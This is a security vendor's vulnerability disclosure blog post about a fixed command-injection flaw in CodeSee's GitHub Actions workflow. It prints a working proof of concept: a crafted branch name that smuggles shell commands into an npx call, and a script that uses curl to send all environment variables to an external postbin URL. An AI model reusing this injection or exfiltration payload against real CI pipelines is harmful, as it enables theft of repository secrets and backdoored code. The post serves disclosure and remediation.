Cycode Collaborates with CodeSee to Secure the Pipelines of Thousands of Open-Source Projects

user profile
Head of Security Research

Securing open-source projects is hard. Securing CI workflows for open-source projects is no less complex. The CI workflows of open-source projects are by definition exposed to the world and can be easily triggered through PR automation without any code review, giving attackers direct access to dev infrastructure. These automation and workflows often leverage third-party components and integrations to improve the development process.

Sometimes, integrating third-party tools, especially for CI purposes, may increase your project’s threat landscape and put you at some risks you didn’t have before. This was the case with CodeSee, with whom we collaborated closely over the past few months and removed one such risk, fixing a vulnerability and applying mitigations affecting thousands of open-source projects.

CodeSee is a startup company providing methods to visualize your codebase and effective tooling for reviewing and collaboration. Similar to other developer-centric products (e.g., CodeCov), during CodeSee integration, it creates a new Github Actions workflow that embeds its capabilities for every pull request, allowing developers efficiently review the added code.

In this blog post, we will describe how we found that this committed workflow contains several vulnerabilities. Chaining these vulnerabilities may allow any user remote code execution (RCE) capabilities on the CI pipeline, which may lead to committing code and exfiltrating sensitive tokens without the proper permissions.

Thousands of open-source projects using CodeSee, including projects with many stars.

Some high-profile projects are:

We worked closely with CodeSee, which quickly fixed them, remediating the immediate risk posed to all the open-source projects integrating the workflow. In addition, we created a roadmap with CodeSee engineers to improve the security posture of the workflow deployed in open-source projects:

  • Fixing command injection vulnerability in the codesee npm package allowing code execution through the branch name. This was fixed in version 0.376.0. Due to pulling the latest version by the workflow, the fix automatically remediates it for all existing integrations.
  • Limiting the permission given to GITHUB_TOKEN through explicit definition. This feature is an excellent post-exploitation mitigation technique for future vulnerabilities in Github Actions workflows. It applies only to newly integrated projects.
  • Implementing the ability to push workflow changes into existing integrations through pull requests and commits to fix future security issues and insert mitigations, such as the permissions mitigations mentioned previously.
  • Creating a roadmap to migrate from the risky trigger event pull_request_target to the safer trigger pull_request.

After we combine all these mitigations, the integrated workflow has become significantly more secure.

Technical Dive

It all started as standard research in which we scanned the most popular repositories and their Github Actions workflow at scale, trying to find vulnerable CI workflows. During that scan, we found many duplicate workflows in different open-source projects. One of those workflows originated from the projects’ integration with CodeSee, a third-party application that gives abilities to visualize your codebase. When we reached out, CodeSee was eager to collaborate with us to secure their workflow.

Analyzing the Github Action Workflow

The workflow looks like the following:

# This workflow was added by CodeSee. Learn more at https://codesee.io/
on:
  pull_request_target:
    types: [opened, synchronize, reopened]
   
  workflow_dispatch:
 
name: CodeSee Map
 
jobs:
  test_map_action:
    runs-on: ubuntu-latest
    continue-on-error: true
    name: Run CodeSee Map Analysis
    steps:
      - name: checkout
        id: checkout
        uses: actions/checkout@v2
        with:
          ref: ${{ github.event.pull_request.head.ref }}
        ...
 
      # codesee-detect-languages has an output with id languages.
      - name: Detect Languages
        id: detect-languages
        uses: Codesee-io/codesee-detect-languages-action@latest
 
      # Configures different environments
      ...
 
      - name: Generate Map
        id: generate-map
        uses: Codesee-io/codesee-map-action@latest
        with:
          step: map
        ...
 
      - name: Upload Map
        id: upload-map
        uses: Codesee-io/codesee-map-action@latest
        with:
          step: mapUpload
        ...
 
      - name: Insights
        id: insights
        uses: Codesee-io/codesee-map-action@latest
        with:
          step: insights
        ...

Due to a series of vulnerabilities and misconfigurations in the workflow above, we were able to completely take over the build machine, which may have led to dangerous malicious behavior. 

We will list the issues found and the possible consequences of such a build hijack.

High Permissions for the Pull Request Trigger

The first issue with the workflow is using the unsafe pull_request_target trigger event. The Github security team posted about this dangerous behavior.

The permissions this workflow receives from Github depend on multiple variables:

  • The trigger event, in our case pull_request_target. This event indicates that this workflow should be triggered on each new pull request to the repository and be given write permissions and access to read secrets, even when pull requests originated with forks. Compared to it, the pull_request trigger event works similarly, but forked pull requests will receive read permissions at most and have no access to secrets.
  • Added permissions tag, limiting permissions even further.
  • Organization settings may also limit the permissions given. We can understand whether these configurations are used by observing the build logs:
GITHUB_TOKEN Permissions
  Actions: write
  Checks: write
  Contents: write
  Deployments: write
  Discussions: write
  Issues: write
  Metadata: read
  Packages: write
  Pages: write
  PullRequests: write
  RepositoryProjects: write
  SecurityEvents: write
  Statuses: write

Reading User Input

The trigger pull_request_target isn’t dangerous on its own. However, if the workflow analyzes the source code, a potential attacker can craft malicious input, create a forked pull request, and hijack the build workflow.

The next issue in the chain is the checkout to the head branch of the pull request.

While it sounds trivial to check out the pull request code, it isn’t the case for forked pull requests. When a workflow checks out the code and runs its tooling on it – build tools, scanners, or another tooling, it should treat that code as unsafe. In addition, not every action  actions/checkout will check out the forked code. The parameter ref: ${{ github.event.pull_request.head.ref }} indicates that.

After the checkout, the workflow runs the CodeSee action Codesee-io/codesee-map-action on the code, which is a wrapper to the codesee npm package. So once we prove that the package analyzes its input insecurely, we’ll be able to perform code execution on the build.

CodeSee was aware of these risks, but their application requires pull_request_target to support the common open-source workflow of contributing using forked pull requests. To mitigate that risk, they took care in writing their code analysis to avoid directly executing any of the code being cloned. They appear to be successful in this regard, as we had to discover an additional issue to gain remote code execution.

Vulnerable NPM Package

This is where things get more interesting. Up to this point, the workflow is running with elevated permissions, checking out the user code, and running an internal NPM package for that code but not yet giving any code execution capability.

We could reverse-engineer the package and find vulnerabilities, but we found a shortcut. When we call Codesee-io/codesee-map-action action with mapUpload parameter, it calls codesee@latest NPM package with upload parameter. It also includes additional arguments, such as the branch name as -f argument. We know that from the action JS code:

async function runCodeseeMapUpload(config, githubEventName, githubEventData) {
  const additionalArguments = config.githubRef ? ["-f", config.githubRef] : [];
 
  if (isPullRequestEvent(githubEventName)) {
    additionalArguments.push("-b", config.githubBaseRef);
    additionalArguments.push("-s", githubEventData.pull_request.base.sha);
    additionalArguments.push("-p", githubEventData.number.toString());
  }
 
  const args = [
    "codesee@latest",
    "upload",
    "--type",
    "map",
    "--repo",
    `https://github.com/${config.origin}`,
    "-a",
    config.apiToken,
    ...additionalArguments,
    "codesee.map.json",
  ];
 
  const runExitCode = await exec.exec("npx", args);
 
  return runExitCode;
}

So we tried sending interesting branch names to test if the program sanitizes it correctly. When we created a pull request with the following branch name: a";ls;" ech , by looking at the logs, we could see that the program crashed:

Upload Map to Codesee Server
  /usr/local/bin/npx codesee@latest upload --type map --repo https://github.com/AlexILOrg/codesee-demo -a *** -f a";ls;"ech -b main -s b8ac0390a31140ea040c51801cdb9bdc65df6e16 -p 8 codesee.map.json
  codesee v0.364.0
  
  Fetching main from https://github.com/AlexILOrg/codesee-demo.git
  
  Error: Command failed: "/usr/bin/git" "merge-base" "b8ac0390a31140ea040c51801cdb9bdc65df6e16" "a";ls;"ech"
  fatal: Not a valid object name a
  /bin/sh: 1: ech: not found
  
CodeSee Map failed: Error: The process '/usr/local/bin/npx' failed with exit code 1
    Error: The process '/usr/local/bin/npx' failed with exit code 1
    at ExecState._setResult (/home/runner/work/_actions/Codesee-io/codesee-map-action/latest/dist/index.js:1185:25)
    at ExecState.CheckComplete (/home/runner/work/_actions/Codesee-io/codesee-map-action/latest/dist/index.js:1168:18)
    at ChildProcess.<anonymous> (/home/runner/work/_actions/Codesee-io/codesee-map-action/latest/dist/index.js:1062:27)
    at ChildProcess.emit (events.js:314:20)
    at maybeClose (internal/child_process.js:1022:16)
    at Process.ChildProcess._handle.onexit (internal/child_process.js:287:5)

By investigating this error log, we have two insights:

  • fatal: Not a valid object name a – instead of taking the complete branch name a";ls; "ech , it consumed only a. This means that the quote sign() terminated the string.
  • /bin/sh: 1: ech: not found – this means we managed to run /bin/sh for the partial text we gave ech, which means we can inject our code!

Let’s see how we use this to execute arbitrary code.

As an attacker, we can create a new malicious script file that would be fetched together with our forked pull request and executed using our code execution capability. It can be quite tricky because:

  • First, we need to give it execution permissions by running chmod. For example, chmod +x ./shell.sh.
  • Second, Github doesn’t allow us to put spaces in branch names. It automatically sanitizes it by replacing it with dashes (-). It complicates creating a script that gives execution permissions to the shell file.

My Capture-the-Flag (CTF) competition history taught me that such mitigations could have bypasses, and indeed short search in Google led me to understand that spaces can be replaced through ${IFS} in Linux shell.

So let’s sum it up and create the flow that causes remote code execution on the pipeline:

  • Let’s say project X contains the vulnerable Github Actions workflow.
  • We, as an attacker, are forking project X.
  • We are adding a new shell file with our “malicious” code for the fork. That code sends all environment variables to the designated postbin server we just created:
env > .env
curl -H 'X-Status: Awesome' --data @'.env' https://www.toptal.com/developers/postbin/1662641903023-0475601626094
  • We commit this shell file into a new branch with the following name: name1";chmod${IFS}+x${IFS}shell.sh;./shell.sh; "name2.
  • We create a pull request to the main branch of project X from our newly created branch.

This flow will execute our “malicious” payload on the CI system.

We can safely talk about this PoC code because the NPM vulnerability has been fixed, and all current CodeSee integrations are working with the updated package.

Consequences

One could ask what the big deal with this demonstrated code execution is; The specified workflow doesn’t contain any interesting environment variables or secrets for which the victims should care. Unfortunately, this is not the main scenario we are afraid of.

Our previous Github Actions vulnerability research showed another scary attack chain. Malicious actors can use a privileged GITHUB_TOKEN to commit additional code to the repository. It would have two consequences:

  • Inserting a backdoor into the code eventually be deployed to end-users.
  • Inserting workflow that would exfiltrate all repository and organization secrets. It may contain sensitive tokens, such as AWS/GCP/Azure tokens, Docker Hub/PyPI/NPM tokens, Github personal access tokens for other repositories, and more.

For our workflow, an attacker could use the privileged GITHUB_TOKEN used for the checkout command. Printing the .git/config.json file yields that token.

Remediation

CodeSee’s internal review discovered this injection vulnerability entered their system as a result of a logical bug in the code used to escape the user-supplied branch name. In addition to repairing that logic directly, they replaced all command executions in their code analysis to run without a shell, ensuring no subtle escaping logic was required. As the CLI is written in node, this involved replacing calls to child_process.exec with child_process.execFile.

To further mitigate any other future vulnerabilities, CodeSee introduced the following permissions in the workflow to minimize that:

permissions: read-all

Even if such vulnerabilities have been found, the GITHUB_TOKEN won’t have sufficient permissions to perform any malicious activity.

Summary

The security process described in this article teaches us three interesting lessons for the emerging landscape of software supply chain security.

The first is the understanding that the threat landscape for the software supply chain increases, especially in the era of developer-focused companies arising to address and improve developer productivity; The second is the ability of security vendors, and non-security vendors to collaborate and de facto improve the security posture of many open-source projects; The third is the esoteric input vector of code injection through the branch name, which hasn’t been fully investigated yet.

We encourage using the lessons learned from this process and applying them to additional workflows, further hardening the security posture of CI pipelines.

Give Cycode a Try

To learn more about how Cycode can help, make an account or schedule a demo today.